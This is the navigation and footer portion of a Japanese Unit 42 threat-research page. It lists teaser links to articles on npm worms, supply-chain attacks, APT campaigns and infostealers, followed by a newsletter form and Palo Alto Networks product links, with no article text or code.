* [Dear Joohn: Sofacyグループのグローバル キャンペーン](https://unit42.paloaltonetworks.com/ja/dear-joohn-sofacy-groups-global-campaign/ "article - table of contents")
* [Sofacyグループの並列攻撃](https://unit42.paloaltonetworks.com/ja/unit42-sofacy-groups-parallel-attacks/ "article - table of contents")

## 関連項目 マルウェア リソース

![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年8月6日 [#### ChainDropの脅威の概要:自己増殖型npmワームの内部](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/ja/tag/blockchain-ja/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/ja/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/ja/tag/claude-code/ "Claude code")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/ "ChainDropの脅威の概要:自己増殖型npmワームの内部")  
  ![Pictorial representation of the npm packages supply chain attack. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/05_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年6月2日 [#### npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Npm packages](https://unit42.paloaltonetworks.com/ja/tag/npm-packages/ "npm packages")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/ "npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)")  
  ![Pictorial representation of Screening Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/Serpens-Iran-A-1920x900-2-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年5月22日 [#### イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/ja/tag/advanced-persistent-threat-ja/ "Advanced Persistent Threat")

* [AppDomainManager](https://unit42.paloaltonetworks.com/ja/tag/appdomainmanager/ "AppDomainManager")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/ "イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡")  
  ![Pictorial representation of Iran cyber attacks. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月17日 [#### 脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/)

* [APK](https://unit42.paloaltonetworks.com/ja/tag/apk-ja/ "APK")

* [DDoS attacks](https://unit42.paloaltonetworks.com/ja/tag/ddos-attacks-ja/ "DDoS attacks")

* [GenAI](https://unit42.paloaltonetworks.com/ja/tag/genai-ja/ "GenAI")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/ "脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)")  
  ![Pictorial representation of the supply chain attack compromising Axios. A giant eye made of glowing binary code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/02_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月1日 [#### 脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/)

* [API attacks](https://unit42.paloaltonetworks.com/ja/tag/api-attacks-ja/ "API attacks")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/ "脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響")  
  ![Pictorial representation of TeamPCP. Glowing code on a screen where several word such as Crime, Hackers, and Security are highlighted in a contrasting color.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/03_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年3月31日 [#### プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/)

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/ "プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃")  
  ![Pictorial representation of phishing campaign. A blurred image focusing on a person typing on a laptop with lines of code visible on the screen, illuminated in blue and red lights, suggestive of intense coding or cyber activities.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/06_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年3月24日 [#### 脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/)

* [Email scam](https://unit42.paloaltonetworks.com/ja/tag/email-scam/ "email scam")

* [Lure](https://unit42.paloaltonetworks.com/ja/tag/lure/ "lure")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム")  
  ![Pictorial representation of Notepad++ supply chain compromise. A digital rendering of Earth from space, focusing on North and South America. The continents are illuminated in blue, with red lines and dots indicating data connections across various locations. Dark background highlights the vibrant network representation.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/11_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月11日 [#### 国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/)

* [Backdoor](https://unit42.paloaltonetworks.com/ja/tag/backdoor-ja/ "backdoor")

* [Cobalt Strike](https://unit42.paloaltonetworks.com/ja/tag/cobalt-strike-ja/ "Cobalt Strike")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/ "国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用")  
  ![Pictorial representation of runtime assembly attacks. Digital artwork of a glowing, futuristic shield disintegrating into small particles, set against a dark blue, bokeh-effect background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/09_Business_email_compromise_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月22日 [#### ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/)

* [API](https://unit42.paloaltonetworks.com/ja/tag/api-ja/ "API")

* [Google](https://unit42.paloaltonetworks.com/ja/tag/google-ja/ "Google")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/ "ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成")  
  ![Pictorial representation of SLOW#TEMPEST campaign. Digital artwork depicting a malware alert symbol on a computer screen, with background of blurred programming code in blue and red colors.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/07_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月2日 [#### Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer](https://unit42.paloaltonetworks.com/ja/vvs-stealer/)

* [Discord](https://unit42.paloaltonetworks.com/ja/tag/discord/ "Discord")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")

* [Python](https://unit42.paloaltonetworks.com/ja/tag/python-ja/ "Python")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/vvs-stealer/ "Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/medical-iot-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
